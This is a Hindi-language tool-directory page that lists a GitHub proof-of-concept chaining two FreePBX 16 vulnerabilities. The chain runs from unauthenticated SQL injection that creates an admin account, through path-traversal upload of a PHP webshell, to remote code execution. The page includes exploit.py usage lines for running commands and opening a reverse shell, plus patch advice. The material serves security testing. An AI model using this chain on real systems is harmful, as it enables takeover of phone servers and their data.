Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-57819-RCE — CVE-2025-57819-RCE_PoC | Kitploit
उपकरण/GitHubGitHub/teteren/cve-2025-57819-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubteteren/cve-2025-57819-rce

CVE-2025-57819-RCE

CVE-2025-57819-RCE_PoC

रिपॉजिटरी देखें
19 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

FreePBX 16 — Unauthenticated SQLi to RCE

सारांश: यह दस्तावेज़ दर्शाता है कि FreePBX 16 में दो कमज़ोरियों (CVE-2025-57819 और CVE-2025-61678) को संयोजित करके बिना प्रमाणीकरण के एक्सेस से रिमोट कोड एक्ज़ीक्यूशन (Remote Code Execution, RCE) तक की पूर्ण आक्रमण श्रृंखला कैसे प्राप्त की जाती है।

CVE कमज़ोरियों की जानकारी

CVE आईडीप्रभावित घटकप्रभाव और कमज़ोरी का प्रकार
CVE-2025-57819Endpoint मॉड्यूल लोडर (brand पैरामीटर)बिना प्रमाणीकरण के स्टैक्ड SQL इंजेक्शन (Unauthenticated Stacked SQL Injection)
CVE-2025-61678Endpoint Manager फर्मवेयर अपलोड प्रोसेसर (fwbrand पैरामीटर)प्रमाणित आर्बिट्ररी फ़ाइल अपलोड / पाथ ट्रैवर्सल (Path Traversal)

आक्रमण सिद्धांत और प्रक्रिया

व्यवस्थापक खाता बनाना (CVE-2025-57819)

नेमस्पेस्ड एंडपॉइंट लोडर (Namespaced Endpoint Loader) के माध्यम से, बिना प्रमाणीकरण के स्टैक्ड SQL इंजेक्शन (Unauthenticated Stacked SQL Injection) कमज़ोरी को ट्रिगर करके, ampusers डेटाबेस टेबल में सीधे पूर्ण अनुमतियों वाला एक नया व्यवस्थापक खाता लिखा जाता है।

प्रमाणीकरण (Authentication)

नवनिर्मित व्यवस्थापक क्रेडेंशियल का उपयोग करके FreePBX के बैकएंड प्रशासनिक इंटरफ़ेस में लॉगिन करें।

WebShell लिखना (CVE-2025-61678)

Endpoint Manager की फर्मवेयर अपलोड सुविधा का दुरुपयोग करके, fwbrand पैरामीटर में पाथ ट्रैवर्सल कमज़ोरी (../../../var/www/html/

) के साथ, PHP WebShell को सीधे वेबसाइट की रूट डायरेक्टरी में लिखा जाता है।

कमांड निष्पादन (Execution)

तैनात किए गए WebShell को कॉल करके एकल सिस्टम कमांड निष्पादित करें, या इंटरैक्टिव रिवर्स शेल बनाएँ।

प्रभावित संस्करण और सुधार अनुशंसाएँ

प्रभावित संस्करण:

  • FreePBX 16 (Endpoint मॉड्यूल संस्करण 16.0.92 से कम)
  • FreePBX 17 (17.0.6 से पहले के संस्करण; 17.0.6 में सुधारा गया)

सुधार अनुशंसा: कृपया जल्द से जल्द नवीनतम पैच किए गए संस्करण में अपडेट करें।

उपयोग विधि (Usage)

root@kitploit:~
# एकल कमांड निष्पादित करें
python3 exploit.py --rhost pbx.example.com --command "id"

# इंटरैक्टिव रिवर्स शेल बनाएँ (pwntools के साथ स्वचालित रूप से सुनना)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444

# प्लेन HTTP और कस्टम पोर्ट का उपयोग करें
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"

पैरामीटर विवरण (Options)

पैरामीटरविवरण
--rhost[आवश्यक] लक्ष्य होस्ट पता (Target Host)
--rportलक्ष्य पोर्ट (डिफ़ॉल्ट: 443)
--httpडिफ़ॉल्ट HTTPS के बजाय HTTP का उपयोग करने के लिए बाध्य करें
टूल डाउनलोड करें